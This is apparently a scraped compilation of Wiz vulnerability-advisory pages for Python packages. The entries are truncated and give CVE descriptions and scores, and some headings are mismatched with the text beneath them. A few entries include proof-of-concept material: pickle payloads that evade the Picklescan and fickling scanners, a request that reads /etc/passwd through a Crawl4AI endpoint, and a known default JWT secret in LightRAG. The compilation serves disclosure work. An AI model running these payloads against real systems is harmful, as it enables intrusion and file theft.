Wagtail is an open source content management system built on Django. Prior to versions 6.3.6, 7.0.4, 7.1.3, 7.2.2, and 7.3, due to a missing permission check on the preview endpoints, a user with access to the Wagtail admin and knowledge of a model's fields can craft a form submission to obtain a preview rendering of any page, snippet or site setting object for which previews are enabled, consisting of any data of the user's choosing. The existing data of the object itself is not exposed, but depending on the nature of the template being rendered, this may expose other database contents that would otherwise only be accessible to users with edit access over the model. The vulnerability is not exploitable by an ordinary site
Wiz
CVE-2026-32722 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.6
CVE-2026-32722 [LOW] CVE-2026-32722 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32722 :
Python vulnerability analysis and mitigation
Memray is a memory profiler for Python. Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping. Because there was no escaping, attacker-controlled command line arguments were inserted as raw HTML into the generated report. This allowed JavaScript execution when a victim opened the generated report in a browser. Version 1.19.2 fixes the issue.
Source : NVD
## 6.1
Score
Published March 18, 2026
Severity MEDIUM
CNA Score 3.6
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-28681 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-28681 [HIGH] CVE-2026-28681 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28681 :
Python vulnerability analysis and mitigation
Internet Routing Registry daemon version 4 is an IRR database server, processing IRR objects in the RPSL format. From version 4.4.0 to before version 4.4.5 and from version 4.5.0 to before version 4.5.1, an attacker can manipulate the HTTP Host header on a password reset or account creation request. The confirmation link in the resulting email can then point to an attacker-controlled domain. Opening the link in the email is sufficient to pass the token to the attacker, who can then use it on the real IRRD instance to take over the account. A compromised account can then be used to modify RPSL objects maintained by the account's mntners and perform other account actions. If the user had two-factor authentication configured,
Wiz
CVE-2025-68279 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2025-68279 [HIGH] CVE-2025-68279 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68279 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to read arbitrary files from the server file system using crafted symbolic links in the repository. Version 5.15.1 fixes the issue.
Source : NVD
## 6.5
Score
Published December 18, 2025
Severity MEDIUM
CNA Score 7.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
weblate
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 21, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on wha
Wiz
CVE-2026-34937 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-34937 [HIGH] CVE-2026-34937 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34937 :
Python vulnerability analysis and mitigation
Source : NVD
## 7.8
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
praisonaiagents
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Python
pr
Wiz
CVE-2025-64725 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.0
CVE-2025-64725 [LOW] CVE-2025-64725 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64725 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. In versions prior to 5.15, it was possible to accept an invitation opened by a different user. Version 5.15. contains a patch. As a workaround, avoid leaving one's Weblate sessions with an invitation opened unattended.
Source : NVD
## 1
Score
Published December 15, 2025
Severity LOW
CNA Score 1.0
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity LOW Has Fix Added at: Dec 16, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in
Wiz
CVE-2026-22033 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-22033 [HIGH] CVE-2026-22033 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22033 :
Python vulnerability analysis and mitigation
Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users’ browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim’s API token or call token reset endpoints — enabling full account takeover and unauthori
Wiz
CVE-2026-28498 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-28498 [HIGH] CVE-2026-28498 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28498 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (
Wiz
CVE-2025-6208 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-6208 [MEDIUM] CVE-2025-6208 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6208 :
Python vulnerability analysis and mitigation
SimpleDirectoryReader
llama_index.core
num_files_limit
Source : NVD
## 5.3
Score
Published February 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
llama-index-core
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Wiz
CVE-2026-29071 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
CVE-2026-29071 [LOW] CVE-2026-29071 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29071 :
Python vulnerability analysis and mitigation
/api/v1/retrieval/query/collection
Source : NVD
## 4.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 3.1
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
cpe:2.3:a:openwebui:open_webui
Sources
pip Severity LOW Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 29, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Apr 05, 2026
Windows Severity MEDIUM Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessm
Wiz
CVE-2026-26013 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-26013 [LOW] CVE-2026-26013 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26013 :
Python vulnerability analysis and mitigation
LangChain is a framework for building agents and LLM-powered applications. Prior to 1.2.11, the ChatOpenAI.get_num_tokens_from_messages() method fetches arbitrary image_url values without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input. This vulnerability is fixed in 1.2.11.
Source : NVD
## 3.7
Score
Published February 10, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.8
Exploitation Probability (EPSS) N/A
Affe
Wiz
CVE-2025-67720 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2025-67720 [MEDIUM] CVE-2025-67720 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67720 :
Python vulnerability analysis and mitigation
Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram's DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69.
Source : NVD
## 6.5
Score
Published December 11, 2025
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
C
Wiz
CVE-2025-68131 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-68131 [MEDIUM] CVE-2025-68131 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68131 :
Python vulnerability analysis and mitigation
cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) serialization format. Starting in version 3.0.0 and prior to version 5.8.0, whhen a CBORDecoder instance is reused across multiple decode operations, values marked with the shareable tag (28) persist in memory and can be accessed by subsequent CBOR messages using the sharedref tag (29). This allows an attacker-controlled message to read data from previously decoded messages if the decoder is reused across trust boundaries. Version 5.8.0 patches the issue.
Source : NVD
## 5.5
Score
Published December 31, 2025
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
CVE-2026-33054 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2026-33054 [CRITICAL] CVE-2026-33054 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33054 :
Python vulnerability analysis and mitigation
Mesop is a Python-based UI framework that allows users to build web applications. Versions 1.2.2 and below contain a Path Traversal vulnerability that allows any user supplying an untrusted state_token through the UI stream payload to arbitrarily target files on the disk under the standard file-based runtime backend. This can result in application denial of service (via crash loops when reading non-msgpack target files as configurations), or arbitrary file manipulation. This vulnerability heavily exposes systems hosted utilizing FileStateSessionBackend. Unauthorized malicious actors could interact with arbitrary payloads overwriting or explicitly removing underlying service resources natively outside the application bounds.
Wiz
CVE-2026-29070 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-29070 [MEDIUM] CVE-2026-29070 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29070 :
Python vulnerability analysis and mitigation
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue.
Source : NVD
## 8.1
Score
Published March 27, 2026
Severity HIGH
CNA Score 5.4
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
Wiz
GHSA-3329-ghmp-jmv5 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-3329-ghmp-jmv5 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-3329-ghmp-jmv5 :
Python vulnerability analysis and mitigation
## Summary
Picklescan uses numpy.f2py.crackfortran.myeval, which is a function in numpy to execute remote pickle files.
## Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.myeval function in its reduce method
Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution.
## PoC
class RCE:
def __reduce__(self):
from numpy.f2py.crackfortran import myeval
return (myeval, ("os.system('ls')",))
## Impact
Any organization or individual
Wiz
CVE-2026-34531 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34531 [MEDIUM] CVE-2026-34531 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34531 :
Python vulnerability analysis and mitigation
Flask-HTTPAuth provides Basic, Digest and Token HTTP authentication for Flask routes. Prior to version 4.8.1, in a situation where the client makes a request to a token protected resource without passing a token, or passing an empty token, Flask-HTTPAuth would invoke the application's token verification callback function with the token argument set to an empty string. If the application had any users in its database with an empty string set as their token, then it could potentially authenticate the client request against any of those users. This issue has been patched in version 4.8.1.
Source : NVD
## 6.5
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Linux Debian
Has Pu
Wiz
CVE-2025-68144 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2025-68144 [MEDIUM] CVE-2025-68144 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68144 :
Python vulnerability analysis and mitigation
--output=/path/to/file
git_diff
Source : NVD
## 6.3
Score
Published December 17, 2025
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mcp-server-git
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 18, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
Wiz
CVE-2026-22870 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-22870 [HIGH] CVE-2026-22870 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22870 :
Python vulnerability analysis and mitigation
GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, GuardDog's safe_extract() function does not validate decompressed file sizes when extracting ZIP archives (wheels, eggs), allowing attackers to cause denial of service through zip bombs. A malicious package can consume gigabytes of disk space from a few megabytes of compressed data. This vulnerability is fixed in 2.7.1.
Source : NVD
## 7.1
Score
Published January 13, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.8
Exploitation Probability (EPSS) 0.1
Affected packages and librari
Wiz
CVE-2026-22777 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-22777 [HIGH] CVE-2026-22777 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22777 :
Python vulnerability analysis and mitigation
ComfyUI-Manager is an extension designed to enhance the usability of ComfyUI. Prior to versions 3.39.2 and 4.0.5, an attacker can inject special characters into HTTP query parameters to add arbitrary configuration values to the config.ini file. This can lead to security setting tampering or modification of application behavior. This issue has been patched in versions 3.39.2 and 4.0.5.
Source : NVD
## 7.5
Score
Published January 10, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
comfy-cl
Wiz
CVE-2025-68146 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2025-68146 [MEDIUM] CVE-2025-68146 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68146 :
Python vulnerability analysis and mitigation
filelock is a platform-independent file lock for Python. In versions prior to 3.20.1, a Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. All users of filelock on Unix, Linux, macOS, and Windows systems are impacted. The vulnerability cascades to dependent libraries. The attack requires local filesystem access and ability to c
Wiz
CVE-2026-33332 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-33332 [MEDIUM] CVE-2026-33332 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33332 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. Prior to version 3.9.0, NiceGUI's app.add_media_file() and app.add_media_files() media routes accept a user-controlled query parameter that influences how files are read during streaming. The parameter is passed to the range-response implementation without validation, allowing an attacker to bypass chunked streaming and force the server to load entire files into memory at once. With large media files and concurrent requests, this can lead to excessive memory consumption, degraded performance, or denial of service. This issue has been patched in version 3.9.0.
Source : NVD
## 6.9
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Pu
Wiz
GHSA-vx9w-5cx4-9796 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-vx9w-5cx4-9796 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vx9w-5cx4-9796 :
Python vulnerability analysis and mitigation
A local file inclusion vulnerability exists in the Crawl4AI Docker API. The /execute_js, /screenshot, /pdf, and /html endpoints accept file:// URLs, allowing attackers to read arbitrary files from the server filesystem.
Attack Vector:
POST /execute_js
{
"url": "file:///etc/passwd",
"scripts": ["document.body.innerText"]
}
Impact
An unauthenticated attacker can:
Read sensitive files (/etc/passwd, /etc/shadow, application configs)
Access environment variables via /proc/self/environ
Discover internal application structure
Potentially read credentials and API keysWorkarounds
Disable the Docker API
Add authentication to the API
Use network-level filtering
Source : NVD
## 9.2
Score
Published January 16, 2026
Wiz
GHSA-5r2p-pjr8-7fh7 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-5r2p-pjr8-7fh7 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5r2p-pjr8-7fh7 :
Python vulnerability analysis and mitigation
## Summary
This advisory addresses the use of the search_hub() function within the SageMaker Python SDK's JumpStart search functionality. An actor with the ability to control query parameters passed to the search_hub() function could potentially provide malformed input that causes the eval() function to execute arbitrary commands, access sensitive data, or compromise the execution environment.
A defense-in-depth enhancement has been implemented to replace code evaluation with safe string operations when processing search query parameters. This enhancement removes the use of eval() from the execution path, replacing it with a safe recursive descent parser. The change was released in SageMaker Python SDK version 3.4.0
Wiz
CVE-2026-26216 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2026-26216 [CRITICAL] CVE-2026-26216 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26216 :
Python vulnerability analysis and mitigation
Crawl4AI versions prior to 0.8.0 contain a remote code execution vulnerability in the Docker API deployment. The /crawl endpoint accepts a hooks parameter containing Python code that is executed using exec(). The import builtin was included in the allowed builtins, allowing unauthenticated remote attackers to import arbitrary modules and execute system commands. Successful exploitation allows full server compromise, including arbitrary command execution, file read and write access, sensitive data exfiltration, and lateral movement within internal networks.
Source : NVD
## 10
Score
Published February 12, 2026
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit
Wiz
GHSA-c65f-x25w-62jv Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-c65f-x25w-62jv Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-c65f-x25w-62jv :
Python vulnerability analysis and mitigation
## Summary
allow_origins=["*"]
allow_credentials=True
allow_methods=["*"]
allow_headers=["*"]
## Affected Code
# server/key-server/app/main.py:86-92
# server/telemetry-server/app/main.py:23-29
app.add_middleware(
CORSMiddleware,
allow_origins=settings.cors_origins, # defaults to ["*"]
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
openssl_encrypt_server/docker-compose.yml:75
CORS_ORIGINS
*
.env.example
CORS_ORIGINS=*
## Impact
This is the most permissive CORS configuration possible, allowing any website to make fully credentialed cross-origin requests to the API. An attacker's website could make authenticated API calls on behalf of any user who visits it.
## Recommended Fix
R
Wiz
CVE-2026-33981 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-33981 [HIGH] CVE-2026-33981 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33981 :
Python vulnerability analysis and mitigation
jq:
jqraw:
env
SALTED_PASS
PLAYWRIGHT_DRIVER_URL
HTTP_PROXY
Source : NVD
## 8.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
changedetection.io
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV expl
Wiz
CVE-2026-3989 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-3989 [CRITICAL] CVE-2026-3989 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3989 :
Python vulnerability analysis and mitigation
replay_request_dump.py
Source : NVD
## 7.8
Score
Published March 12, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
SGLang
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sglang
cpe:2.3:a:lmsys:sglang
Sources
NVD
pip Severity HIGH No Fix Added at: Mar 12, 2026
Linux Severity HIGH No Fix Added at: Apr 02, 2026
Windows Severity HIGH No Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerab
Wiz
CVE-2026-32874 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-32874 [HIGH] CVE-2026-32874 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32874 :
Python vulnerability analysis and mitigation
UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Versions 5.4.0 through 5.11.0 contain an accumulating memory leak in JSON parsing large (outside of the range [-2^63, 2^64 - 1]) integers. The leaked memory is a copy of the string form of the integer plus an additional NULL byte. The leak occurs irrespective of whether the integer parses successfully or is rejected due to having more than sys.get_int_max_str_digits() digits, meaning that any sized leak per malicious JSON can be achieved provided that there is no limit on the overall size of the payload. Any service that calls ujson.load()/ujson.loads()/ujson.decode() on untrusted inputs is affected and vulnerable to denial of serv
Wiz
CVE-2026-30762 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-30762 CVE-2026-30762 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30762 :
Python vulnerability analysis and mitigation
Subject: Security Vulnerability Report Hardcoded JWT Secret (CVE-2026-30762)
Hi HKUDS team,
I'm writing to report a security vulnerability I discovered in LightRAG v1.4.10. This has been assigned CVE-2026-30762 by MITRE.
Vulnerability: Hardcoded JWT signing secret
Type: Improper Authentication (CWE-287)
Severity: High
Attack Vector: Remote / Unauthenticated
Summary:
The file lightrag/api/config.py (line 397) uses a default JWT secret "lightrag-jwt-default-secret" when the TOKEN_SECRET environment variable is not set. The AuthHandler in lightrag/api/auth.py (lines 24-25) uses this secret to sign and verify tokens. An unauthenticated attacker can forge valid JWT tokens using the publicly known default secret and gain access t
Wiz
CVE-2026-33155 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-33155 [HIGH] CVE-2026-33155 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33155 :
Python vulnerability analysis and mitigation
DeepDiff is a project focused on Deep Difference and search of any Python data. From version 5.0.0 to before version 8.6.2, the pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data. This issue has been patched in version 8.6.2.
Source : NVD
## 8.7
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Chainguard
Has Pu
Wiz
GHSA-wccx-j62j-r448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-wccx-j62j-r448 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-wccx-j62j-r448 :
Python vulnerability analysis and mitigation
## Assessment
pickle.loads
_pickle.loads
_pickle.load
## Original report
## Summary
fickling.always_check_safety()
pickle.loads
_pickle.loads
_pickle.load
## Affected versions
<= 0.1.8
## Non-duplication check against published Fickling GHSAs
run_hook()
## Root cause
run_hook()
pickle.load
pickle.Unpickler
_pickle.Unpickler
pickle.loads
_pickle.load
_pickle.loads
## Reproduction (clean upstream)
import io, pickle, _pickle
from unittest.mock import patch
import fickling
from fickling.exception import UnsafeFileError
class Payload:
def __reduce__(self):
import subprocess
return (subprocess.Popen, (['echo','BYPASS'],))
data = pickle.dumps(Payload())
fickling.always_check_safety()
# Bypa
Wiz
CVE-2025-65713 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.0
CVE-2025-65713 [MEDIUM] CVE-2025-65713 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65713 :
Python vulnerability analysis and mitigation
Home Assistant Core before v2025.8.0 is vulnerable to Directory Traversal. The Downloader integration does not fully validate file paths during concatenation, leaving a path traversal vulnerability.
Source : NVD
## 4
Score
Published December 23, 2025
Severity MEDIUM
CNA Score 4.0
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
home-assistant
homeassistant
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 24, 2025
Homebrew Severity MEDIUM Has Fix Added at: Jan 08, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-25990 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-25990 [HIGH] CVE-2026-25990 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25990 :
Python vulnerability analysis and mitigation
Pillow is a Python imaging library. From 10.3.0 to before 12.1.1, n out-of-bounds write may be triggered when loading a specially crafted PSD image. This vulnerability is fixed in 12.1.1.
Source : NVD
## 8.9
Score
Published February 11, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tensorflow-cpu-jupyter
python3-pillow
Sources
NVD
Alpine 3.23, edge Severity HIGH Has Fix Added at: Feb 15, 2026
Chainguard Has Fix Added at: Feb 15, 2026
Debian 11, 12 No Fix Added at: Feb 12,
Wiz
CVE-2026-4539 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-4539 [CRITICAL] CVE-2026-4539 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4539 :
Python vulnerability analysis and mitigation
A security flaw has been discovered in pygments up to 2.19.2. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 22, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probabil
Wiz
CVE-2026-26057 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-26057 [MEDIUM] CVE-2026-26057 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26057 :
Python vulnerability analysis and mitigation
